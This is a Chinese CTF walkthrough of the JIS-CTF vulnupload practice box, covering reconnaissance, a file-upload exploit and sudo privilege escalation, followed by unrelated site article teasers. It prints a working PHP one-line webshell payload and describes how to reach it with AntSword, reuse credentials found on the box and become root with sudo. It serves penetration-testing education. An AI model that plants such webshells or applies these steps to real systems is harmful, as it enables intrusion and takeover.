news 2026/4/3 6:29:10

JIS-CTF-vulnupload靶场实验,拿下靶机flag(从渗透到提权全攻略)

作者头像

张小明

前端开发工程师

1.2k 24
文章封面图
JIS-CTF-vulnupload靶场实验,拿下靶机flag(从渗透到提权全攻略)

实验目的:

掌握nmap、dirb等工具的使用,掌握单主机渗透常规思路。

软件工具:

Nmap,dirb ,AntSword

实验目标:

获得flag

实验步骤:

信息收集

在kali中打开终端,使用nmap工具对目标机器进行扫描

发现目标开启了http服务也就是80端口

在浏览器上输入靶机ip看看,发现是个登录界面

尝试一下sql注入发现好像不行,也没有发现什么信息

接着使用dirsearch工具进行路径的扫描(-i返回200状态码的)

扫描出了不少的路径,看到了网络爬虫协议

下面列出来禁止爬取的路径,那就不告诉我们存在这些路径

在/flag路径下拿到第一个flag

接着查找一下别的路径,在路径下有个管理员路径显示无法使用,但是返回的状态码是200

ctrl+u查看一下源代码

果然藏了东西,获得第二个flag并且还有一个账号和密码,想到刚刚的登录界面尝试登录一下首页

这是一个文件上传的页面,上传带有一句话木马的php

<?php @eval($_POST[hack])?> 然后修改后缀为php的文件

发现竟然可以成功上传

在之前的路径扫描中知道路径下有个uploaded_files/的路径,尝试一下

成功上传,并且执行了phpinfo命令

接着使用蚁剑进行连接,密码是刚刚一句话木马里面的hack

在hint.txt中成功拿到第三个flag

上传有个提示告诉我们存在一个用户technawi,并且有个flag.txt文件需要这个权限

接着我们打开蚁剑的终端窗口

定位technawi用户文件:find / -user ‘technawi’ 2>/dev/null

(这个命令的核心是在整个文件系统中查找所有属于用户 technawi 的文件 / 目录,同时屏蔽执行过程中产生的 “权限不足” 等错误提示,只输出有效结果。)

-user:find 命令的内置参数,专门用于匹配 “文件属主”;

2>/dev/null:2标准错误输出 >重定向 /dev/null 空设备,相当于被丢弃

发现有个txt文件比较奇怪,查询试试

成功拿到第四个flag

里面竟然存放了technawi的账号和密码

接着回到虚拟机登录一下这个用户的账号和密码,使用远程连接ssh@靶机的ip

然后查看flag.txt文件

成功拿到第5个flag

Sudo提权

前面我们在home目录下发现 .sudo_as_admin_successful 文件,表示需要使用sudo提权。

输入sudo -l :查看用户technawi的sudo权限配置

显示“ALL”说明technawi可以用自己的密码切换为 root 用户

简单来说就是:即可以通过 sudo 获取 root 权限

直接输入sudo su

成功提权成为root用户

版权声明: 本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若内容造成侵权/违法违规/事实不符,请联系邮箱:809451989@qq.com进行投诉反馈,一经查实,立即删除!
网站建设 2026/3/28 21:11:11

串口的一些实用电路分析与介绍

一、串口的基本概念 串口&#xff08;Serial Port&#xff09;是计算机中常用的一种通信接口&#xff0c;用于串行数据的传输。与并行接口&#xff08;Parallel Port&#xff09;相比&#xff0c;串口通过一根传输线按顺序逐位传输数据&#xff0c;因此称为“串行通信”。顾名…

作者头像 李华
网站建设 2026/4/1 19:01:11

亲测推荐:2个真正能用的免费降AI率的工具,知网AIGC检测稳过

3个实测免费的降AIGC率工具&#xff0c;顺利通过ai率查重&#xff01; AI 检测本身就没有公开算法&#xff0c;降 AI 工具更像黑箱。如果降AI率连一次免费试用都不给&#xff0c;那风险太大了。万一AI率没有降下来&#xff0c;又不能退&#xff0c;少则几元多则几十。 对于学…

作者头像 李华
网站建设 2026/3/30 18:27:36

构建企业级RAG系统:Java与向量数据库的深度集成与优化实战

1. 引言 随着大型语言模型(LLM)的爆发,企业对于如何利用私有数据构建智能应用的需求呈指数级增长。然而,LLM 固有的“知识截止”和“幻觉”问题,使其无法直接满足高精度的企业级问答需求。检索增强生成(Retrieval-Augmented Generation, RAG)架构应运而生,成为了连接 …

作者头像 李华
网站建设 2026/3/22 4:07:31

1985-2024年中国绿色专利数据库(绿色技术专利分类)

企业开展绿色创新研究对实现"双碳"目标和可持续发展具有重要意义。这一举措不仅能帮助企业在环保转型中建立竞争优势&#xff0c;还能通过降低环境成本、开拓新兴市场来增强社会责任表现。作为衡量绿色创新的关键指标&#xff0c;绿色专利数据具有多重价值&#xff1…

作者头像 李华
网站建设 2026/4/2 21:47:16

MinIO分片上传实践:从同步到异步的效率跃迁与代码解析

MinIO分片上传实践&#xff1a;从同步到异步的效率跃迁与代码解析在大文件上传场景中&#xff0c;单文件直接上传易面临超时、内存溢出、网络抖动导致传输中断等问题。MinIO作为兼容S3协议的高性能对象存储&#xff0c;其分片上传机制通过将大文件拆分为多个小分片传输&#xf…

作者头像 李华
网站建设 2026/3/31 11:46:14

八皇后问题

八皇后问题是 CSDN 上的经典算法话题&#xff0c;多篇博客从不同角度详细解析了这一经典回溯算法案例。以下是 CSDN 博主们对八皇后问题的核心讨论&#xff1a;一、问题概述定义&#xff1a;在 88 的国际象棋棋盘上放置 8 个皇后&#xff0c;使任意两个皇后都不能互相攻击&…

作者头像 李华